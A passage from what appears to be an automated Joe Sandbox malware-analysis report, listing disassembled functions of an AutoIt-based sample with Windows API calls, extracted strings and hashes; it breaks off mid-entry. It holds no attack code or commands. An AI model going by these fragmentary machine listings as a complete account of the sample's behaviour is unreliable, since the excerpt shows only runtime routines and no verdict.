                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: 4996a9e484cb376ba4f579865f8fa0fa47b2cb3f047bbf6f1e76b27d99a9d3c2
                                          • Instruction ID: cd9079876b1e14fec48983f39a1a1801cfa88323f17128dec329c777e5ff5568
                                          • Opcode Fuzzy Hash: 4996a9e484cb376ba4f579865f8fa0fa47b2cb3f047bbf6f1e76b27d99a9d3c2
                                          • Instruction Fuzzy Hash: 7BA17EB1A40219BFEB14DBA5DC4AFAF7BB9EB09710F004114FA15A76E1C770AD90CB64
                                          Function 0011B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0011B361
                                          • GetDriveTypeW.KERNEL32(?,00142C4C,?,\\.\,00140980), ref: 0011B43E
                                          • SetErrorMode.KERNEL32(00000000,00142C4C,?,\\.\,00140980), ref: 0011B59C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: b3fc38c467ee3b506a5adeca5ba2ca04ea7fdea639e69ac9e51d9667c100ccd1
                                          • Instruction ID: 799a1f83637652d095c7fc0c21d1a60d2dd26feb5463f1e16787a248e7a87bec
                                          • Opcode Fuzzy Hash: b3fc38c467ee3b506a5adeca5ba2ca04ea7fdea639e69ac9e51d9667c100ccd1
                                          • Instruction Fuzzy Hash: 3C519034B4C609EBCB4CDB20CDC2AFC77A2AB49740B648035E406E72E2D771AED1DA51
                                          Function 0013A041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0013A0F7
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0013A1B0
                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 0013A1CC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: 0
                                          • API String ID: 2326795674-4108050209
                                          • Opcode ID: 11d1e403e4251fb6ddfde40e48b5c0291f7a0fafd03068f49a94d6331ee4e7b4
                                          • Instruction ID: 739e702ea11adacacfb94da584ef236a0955fc9b8091ee172dc3bbc0eb266023
                                          • Opcode Fuzzy Hash: 11d1e403e4251fb6ddfde40e48b5c0291f7a0fafd03068f49a94d6331ee4e7b4
                                          • Instruction Fuzzy Hash: 3E02DF70108301AFDB19CF14C849BAABBE4FF89314F48861DF9DA962A1C775D984CB93
                                          Function 0013AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(00000012), ref: 0013AF51
                                          • SetTextColor.GDI32(?,?), ref: 0013AF55
                                          • GetSysColorBrush.USER32(0000000F), ref: 0013AF6B
                                          • GetSysColor.USER32(0000000F), ref: 0013AF76
                                          • CreateSolidBrush.GDI32(?), ref: 0013AF7B
                                          • GetSysColor.USER32(00000011), ref: 0013AF93
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0013AFA1
                                          • SelectObject.GDI32(?,00000000), ref: 0013AFB2
                                          • SetBkColor.GDI32(?,00000000), ref: 0013AFBB
                                          • SelectObject.GDI32(?,?), ref: 0013AFC8
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0013AFE7
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0013AFFE
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0013B013
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0013B05F
                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0013B086
                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0013B0A4
                                          • DrawFocusRect.USER32(?,?), ref: 0013B0AF
                                          • GetSysColor.USER32(00000011), ref: 0013B0BD
                                          • SetTextColor.GDI32(?,00000000), ref: 0013B0C5
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0013B0D9
                                          • SelectObject.GDI32(?,0013AC1F), ref: 0013B0F0
                                          • DeleteObject.GDI32(?), ref: 0013B0FB
                                          • SelectObject.GDI32(?,?), ref: 0013B101
                                          • DeleteObject.GDI32(?), ref: 0013B106
                                          • SetTextColor.GDI32(?,?), ref: 0013B10C
                                          • SetBkColor.GDI32(?,?), ref: 0013B116
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          • Opcode ID: 1bb0f8f6008f1add04fe89f70927c58e0ae9636a207e9879f11e5125fe3d6c31
                                          • Instruction ID: d57763e2a016bd86e31ed7869bfd11887be3c3c8ed6a94b3b0812d894e8ed195
                                          • Opcode Fuzzy Hash: 1bb0f8f6008f1add04fe89f70927c58e0ae9636a207e9879f11e5125fe3d6c31
                                          • Instruction Fuzzy Hash: 31617C75900218BFDF169FA5DC48EAE7B79EF09320F114115FA15AB2A1D7719980CF90
                                          Function 00138FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001390EA
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001390FB
                                          • CharNextW.USER32(0000014E), ref: 0013912A
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0013916B
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00139181
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00139192
                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 001391AF
                                          • SetWindowTextW.USER32(?,0000014E), ref: 001391FB
                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00139211
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00139242
                                          • _memset.LIBCMT ref: 00139267
                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 001392B0
                                          • _memset.LIBCMT ref: 0013930F
                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00139339
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00139391
                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 0013943E
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00139460
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001394AA
                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001394D7
                                          • DrawMenuBar.USER32(?), ref: 001394E6
                                          • SetWindowTextW.USER32(?,0000014E), ref: 0013950E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                          • String ID: 0
                                          • API String ID: 1073566785-4108050209
                                          • Opcode ID: 50da400107ed8809f0c00ca3b3ad15ed330f97bb5bd6d4f3203f7164c797fd18
                                          • Instruction ID: 6c0e8cd5d0dc1432cf4cad8b87408e141f3d0e5124a1216deb2dd926aac08811
                                          • Opcode Fuzzy Hash: 50da400107ed8809f0c00ca3b3ad15ed330f97bb5bd6d4f3203f7164c797fd18
                                          • Instruction Fuzzy Hash: 30E1B175900209AFDF259F55CC88EEF7BBCEF09750F108156FA19AA291D7B08A81CF61
                                          Function 00134ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00135007
                                          • GetDesktopWindow.USER32 ref: 0013501C
                                          • GetWindowRect.USER32(00000000), ref: 00135023
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00135085
                                          • DestroyWindow.USER32(?), ref: 001350B1
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001350DA
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001350F8
                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0013511E
                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00135133
                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00135146
                                          • IsWindowVisible.USER32(?), ref: 00135166
                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00135181
                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00135195
                                          • GetWindowRect.USER32(?,?), ref: 001351AD
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 001351D3
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 001351ED
                                          • CopyRect.USER32(?,?), ref: 00135204
                                          • SendMessageW.USER32(?,00000412,00000000), ref: 0013526F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: 7dfc0c93b752dc6e3f5fd5a6a4c185fe8cab575b78cf84b24d9d9a9e4aacae7d
                                          • Instruction ID: 6be34a5d75a76a16ac22a6054d083eee215a43991f32569b23a78236fdbc71f0
                                          • Opcode Fuzzy Hash: 7dfc0c93b752dc6e3f5fd5a6a4c185fe8cab575b78cf84b24d9d9a9e4aacae7d
                                          • Instruction Fuzzy Hash: EFB18C71604740AFD704DF65C848BABBBE5FF89710F008A1CF9999B2A2D771E845CB92
                                          Function 0011498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0011499C
                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001149C2
                                          • _wcscpy.LIBCMT ref: 001149F0
                                          • _wcscmp.LIBCMT ref: 001149FB
                                          • _wcscat.LIBCMT ref: 00114A11
                                          • _wcsstr.LIBCMT ref: 00114A1C
                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00114A38
                                          • _wcscat.LIBCMT ref: 00114A81
                                          • _wcscat.LIBCMT ref: 00114A88
                                          • _wcsncpy.LIBCMT ref: 00114AB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                          • API String ID: 699586101-1459072770
                                          • Opcode ID: 8dafc35768f09ecc4ff2e6f81e1aa8405b64970db74e0ee03c67951b2bc1f576
                                          • Instruction ID: 9ade2f768b5473b81983a3535645d0199737b8dfb9cd179da169331f54459904
                                          • Opcode Fuzzy Hash: 8dafc35768f09ecc4ff2e6f81e1aa8405b64970db74e0ee03c67951b2bc1f576
                                          • Instruction Fuzzy Hash: D44105726043047BEB14B7609C43EFF7BACDF45720F00047AF905A6293EB74AA8196B6
                                          Function 000B2BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000B2C8C
                                          • GetSystemMetrics.USER32(00000007), ref: 000B2C94
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000B2CBF
                                          • GetSystemMetrics.USER32(00000008), ref: 000B2CC7
                                          • GetSystemMetrics.USER32(00000004), ref: 000B2CEC
                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000B2D09
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000B2D19
                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000B2D4C
                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000B2D60
                                          • GetClientRect.USER32(00000000,000000FF), ref: 000B2D7E
                                          • GetStockObject.GDI32(00000011), ref: 000B2D9A
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 000B2DA5
                                            • Part of subcall function 000B2714: GetCursorPos.USER32(?), ref: 000B2727
                                            • Part of subcall function 000B2714: ScreenToClient.USER32(001777B0,?), ref: 000B2744
                                            • Part of subcall function 000B2714: GetAsyncKeyState.USER32(00000001), ref: 000B2769
                                            • Part of subcall function 000B2714: GetAsyncKeyState.USER32(00000002), ref: 000B2777
                                          • SetTimer.USER32(00000000,00000000,00000028,000B13C7), ref: 000B2DCC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: 461dca34a2fb4a9ab96185f87cb4e5913d65f88073a18262c16cfeba322980bf
                                          • Instruction ID: cc57e530ba32f5ac649f27d50e98dc78ca357499923255f42c18d10ed723b99f
                                          • Opcode Fuzzy Hash: 461dca34a2fb4a9ab96185f87cb4e5913d65f88073a18262c16cfeba322980bf
                                          • Instruction Fuzzy Hash: 9CB17A75A0020A9FDB15DFA9DD49FEE7BB4FB08311F104229FA15A72E0DB70A891CB51
                                          Function 000D0429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          • GetForegroundWindow.USER32(00140980,?,?,?,?,?), ref: 000D04E3
                                          • IsWindow.USER32(?), ref: 001066BB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$Foreground_memmove
                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                          • API String ID: 3828923867-1919597938
                                          • Opcode ID: 7d69e9e6188acd13199a3938c84f070669cc152a210c01fbaec99ceecfad5f2f
                                          • Instruction ID: 683ea1b77369d2ca584e02ba373ed9582ed5c64e89c137b18f0fb426f1e9f31e
                                          • Opcode Fuzzy Hash: 7d69e9e6188acd13199a3938c84f070669cc152a210c01fbaec99ceecfad5f2f
                                          • Instruction Fuzzy Hash: 80D1B430104702DBCB04EF20C981AEABBB5BF55344F504A1EF499576A3DB71E969CBA2
                                          Function 0013441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 001344AC
                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0013456C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                          • API String ID: 3974292440-719923060
                                          • Opcode ID: d46535c1378aca3f6cf10eb3591685e8726c1d5a1d17663ede608e128111ba60
                                          • Instruction ID: 1e671059a93bfda46abb8f792fcd883b007bfc615743756902a95c5dcde6dbd8
                                          • Opcode Fuzzy Hash: d46535c1378aca3f6cf10eb3591685e8726c1d5a1d17663ede608e128111ba60
                                          • Instruction Fuzzy Hash: 0EA15C702143419FCB14EF24C951AAAB7A6EF95314F108969F8969B3E3DB30FD05CB92
                                          Function 001256C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadCursorW.USER32(00000000,00007F89), ref: 001256E1
                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 001256EC
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 001256F7
                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00125702
                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0012570D
                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00125718
                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00125723
                                          • LoadCursorW.USER32(00000000,00007F88), ref: 0012572E
                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00125739
                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00125744
                                          • LoadCursorW.USER32(00000000,00007F83), ref: 0012574F
                                          • LoadCursorW.USER32(00000000,00007F85), ref: 0012575A
                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00125765
                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00125770
                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0012577B
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00125786
                                          • GetCursorInfo.USER32(?), ref: 00125796
                                          • GetLastError.KERNEL32(00000001,00000000), ref: 001257C1
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Cursor$Load$ErrorInfoLast
                                          • String ID:
                                          • API String ID: 3215588206-0
                                          • Opcode ID: 9373d204c97fa4c0ceaf81b659de5b4a29707952d52bdbf90e77d46b463f2db0
                                          • Instruction ID: 4ce20ba93b857e9a3fd92dbcca96db9832952a30df67f4fefea056d57d7d6b3a
                                          • Opcode Fuzzy Hash: 9373d204c97fa4c0ceaf81b659de5b4a29707952d52bdbf90e77d46b463f2db0
                                          • Instruction Fuzzy Hash: C0418570E44319AADB109FBA9C49D6EFFF8EF51B10B10452FE509E7291DBB8A500CE51
                                          Function 0010B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0010B17B
                                          • __swprintf.LIBCMT ref: 0010B21C
                                          • _wcscmp.LIBCMT ref: 0010B22F
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0010B284
                                          • _wcscmp.LIBCMT ref: 0010B2C0
                                          • GetClassNameW.USER32(?,?,00000400), ref: 0010B2F7
                                          • GetDlgCtrlID.USER32(?), ref: 0010B349
                                          • GetWindowRect.USER32(?,?), ref: 0010B37F
                                          • GetParent.USER32(?), ref: 0010B39D
                                          • ScreenToClient.USER32(00000000), ref: 0010B3A4
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0010B41E
                                          • _wcscmp.LIBCMT ref: 0010B432
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0010B458
                                          • _wcscmp.LIBCMT ref: 0010B46C
                                            • Part of subcall function 000D385C: _iswctype.LIBCMT ref: 000D3864
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                          • String ID: %s%u
                                          • API String ID: 3744389584-679674701
                                          • Opcode ID: 7ea8163c98a6baa0a37d679f3d212d584cee30680f1230a9e2f3c71874b9e7b9
                                          • Instruction ID: bc8df1b7df84d9cfa7db439256590a9961697ba2ef6e6b451322be3b8aba09f9
                                          • Opcode Fuzzy Hash: 7ea8163c98a6baa0a37d679f3d212d584cee30680f1230a9e2f3c71874b9e7b9
                                          • Instruction Fuzzy Hash: EBA1BE71208306ABD719DF64C8C4BEAB7A8FF48354F108529F9DAC2191DB70EA55CBA1
                                          Function 0010BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0010BAB1
                                          • _wcscmp.LIBCMT ref: 0010BAC2
                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0010BAEA
                                          • CharUpperBuffW.USER32(?,00000000), ref: 0010BB07
